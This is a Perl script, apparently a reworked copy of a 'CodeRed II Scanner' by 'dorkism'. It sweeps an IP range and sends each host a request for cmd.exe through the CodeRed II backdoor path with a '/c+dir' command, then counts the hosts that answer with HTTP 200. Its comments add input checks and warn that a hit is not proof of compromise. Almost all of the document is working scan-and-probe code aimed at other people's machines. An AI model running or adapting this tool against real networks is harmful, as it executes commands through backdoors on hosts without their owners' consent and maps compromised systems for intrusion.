#!/usr/bin/perl

# CodeRed II Scanner - dorkism
# www.dorkism.net

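# Probe table, kept as two parallel arrays: $names[$i] is the label printed
# for the request in $crpath[$i]. The single entry asks the web server for
# cmd.exe through a "/c" path, which this script labels "CodeRed II Backdoor".
@crpath = ("GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n");
@names  = ("CodeRed II Backdoor");

# Counters shared with the subs below (package globals on purpose: the subs
# read and update them by name, so they cannot become lexicals here without
# changing every sub as well).
$insecure = 0;    # probes answered with HTTP status 200
$size     = 0;    # hosts that accepted the initial TCP connection

system "clear";
use IO::Socket;
my ($port, $sock, $server);

if (!$ARGV[0]) {
    &usage;
    exit;
}

# Range argument: a.b.c[.d]-e, scanning the last octet from d up to e.
$server = $ARGV[0];
($s) = split(/-/, $server);

# Validate the argument before building any address from it. Without this,
# arbitrary text from the command line is interpolated into the target
# string and handed to the resolver.
my @octets = $server =~ /\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})(?:\.(\d{1,3}))?-(\d{1,3})\z/;
if (!@octets) {
    &usage;
    exit;
}
($ia, $ib, $id, $ix, $e) = map { defined $_ ? $_ + 0 : undef } @octets;

# The usage example omits the fourth octet. The original loop then started
# from an undefined value and built "a.b.c." (empty last octet) for its first
# probe; start at 1 instead so every generated string is a real address.
$ix = 1 unless defined $ix;

my $out_of_range = grep { $_ > 255 } ($ia, $ib, $id, $ix, $e);
if ($out_of_range || $ix > $e) {
    &usage;
    exit;
}

# Optional second argument: TCP port, default 80. cr_scan passes it to
# sockaddr_in, so it has to be a number in the valid port range.
$port = $ARGV[1];
if (!$ARGV[1]) { $port = 80; }
if ($port !~ /\A\d{1,5}\z/ || $port < 1 || $port > 65535) {
    &usage;
    exit;
}

print "[CodeRed II Scanner - dorkism]\n";
print "[Scaning from $s to $ia.$ib.$id.$e]\n";

for $i ($ix .. $e) {
    $server = "$ia.$ib.$id.$i";

    # Must stay "&connect": a plain connect(...) would be parsed as the
    # socket builtin rather than the sub defined in this file.
    &connect;
}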

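# Reachability check for the current target.
#
# Reads the file-level $server and $port, tries a TCP connection with
# IO::Socket::INET and, only when that succeeds, runs the probe loop and
# counts the host in $size. Hosts that do not accept the connection are
# skipped without output. Takes no arguments; the return value is unused.
#
# Note: this sub shares its name with the connect() builtin, so it can only
# be called with the & sigil.
sub connect {
    #print "[Trying $server]\n";
    $sock = IO::Socket::INET->new(
        PeerAddr => $server,
        PeerPort => $port,
        Proto    => 'tcp',
    );

    return unless $sock;

    print "[Connected to $server on $port]\n";
    $n = 0;    # index into @names; loopty_loop advances it per probe
    &loopty_loop;

    # The original closed the bareword handle "sock", which is a different
    # handle from $sock, so this connection was never closed explicitly.
    close($sock);
    $size++;
}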

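# Run every request in @crpath against the current target.
#
# For each entry: print its label from @names (indexed by the global $n,
# which the caller resets to 0), copy the request into $scw for cr_scan,
# run cr_scan, then advance $n. Takes no arguments.
sub loopty_loop {
    foreach $crpath (@crpath) {
        # $names[$n] is the scalar element; the original used the
        # one-element slice @names[$n], which prints the same text.
        $name = $names[$n];
        print "Searching for $name : ";
        $scw = $crpath;
        &cr_scan;
        $n++;
    }

    # No close(SOCK) here: cr_scan closes SOCK itself after each probe.
}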

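# Send the request held in $scw to $server:$port and classify the reply.
#
# Opens its own socket on the bareword handle SOCK, writes the request, reads
# the first line of the response and prints "[Found!]" (incrementing
# $insecure) when that line is an HTTP status line with code 200, otherwise
# "[Not Found]". Dies if the address cannot be resolved or the socket cannot
# be created or connected.
#
# A 200 only shows that the server answered this request successfully. A
# catch-all handler, a proxy or a honeypot can produce the same status, so a
# hit is a lead to confirm on the host itself, not proof of compromise.
sub cr_scan {
    my ($iaddr, $paddr, $proto);
    $iaddr = inet_aton($server)         || die "Error: $!";
    $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
    $proto = getprotobyname('tcp')      || die "Error: $!";

    # The original called &error(...) on failure, but no error() sub is
    # defined in this file, so those calls would themselves have died with
    # "Undefined subroutine". Die with the real reason instead.
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Failed to open socket: $!";
    connect(SOCK, $paddr) || die "Unable to connect: $!";
    send(SOCK, $scw, 0);

    my $status_line = <SOCK>;
    close(SOCK);

    # Require a real status line ("HTTP/x.y NNN ...") and an exact three-digit
    # code. The original compared the second space-separated field with ==,
    # which also accepted values such as "200abc", accepted a 200 in any
    # non-HTTP banner, and compared undef when the peer sent nothing.
    my $found = 0;
    if (defined $status_line
        && $status_line =~ m{\AHTTP/\d+\.\d+\s+(\d{3})(?!\d)}
        && $1 == 200)
    {
        $found = 1;
    }

    if ($found) {
        print "[Found!]\n";
        $insecure++;
    }
    else {
        print "[Not Found]\n";
    }
}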

################################ USAGE ##########################
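# Print the banner and command-line help, then exit with status 0.
#
# The usage line now lists the optional port argument: the script reads it
# from the second command-line argument and falls back to 80 when it is
# absent, but the original help text did not mention it.
sub usage {
    print "[CodeRed II Scanner - dorkism]\n",
          "[Usage: perl cr2_scan.pl <startip>-<end> [port]]\n",
          "[Example: perl cr2_scan.pl 192.168.1-255]\n";
    exit(0);
}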
################################ END   ##########################
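# Report the two counters the script maintains while scanning; the original
# incremented them but never printed them. $size counts hosts that accepted
# the TCP connection, $insecure counts probes answered with HTTP 200.
print "[Hosts reached: $size, positive responses: $insecure]\n";
print "[End Of Scan. Have a good day...]\n";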
